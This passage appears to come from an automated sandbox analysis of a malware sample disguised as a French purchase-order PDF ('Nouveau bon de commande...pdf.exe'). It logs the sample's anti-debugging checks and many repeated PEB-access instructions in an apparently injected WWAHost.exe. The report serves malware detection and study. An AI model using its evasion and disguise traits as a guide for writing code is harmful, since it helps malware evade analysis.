          Source: explorer.exe, 00000003.00000000.259157463.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.259157463.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WWAHost.exe, 0000000A.00000002.473051684.0000000002BD3000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000003.00000000.259157463.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeCode function: 2_2_00409B20 LdrLoadDll,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03643B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03643B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03614F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03614F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03644BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03621B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03621B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03628794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03697794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0365927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03619240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03627E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03654A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03654A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03648E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03628A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03615210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03615210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03633A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03658EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03653D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03693540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03637D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03634120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03634120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03623D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0369A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03644D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03619100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0361B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03641DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03641DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03641DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03612D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03642990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0363746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03630050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03630050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0362B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0364002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03696C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03697016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03697016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03697016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_036158EC mov eax, dword ptr fs:[00000030h]
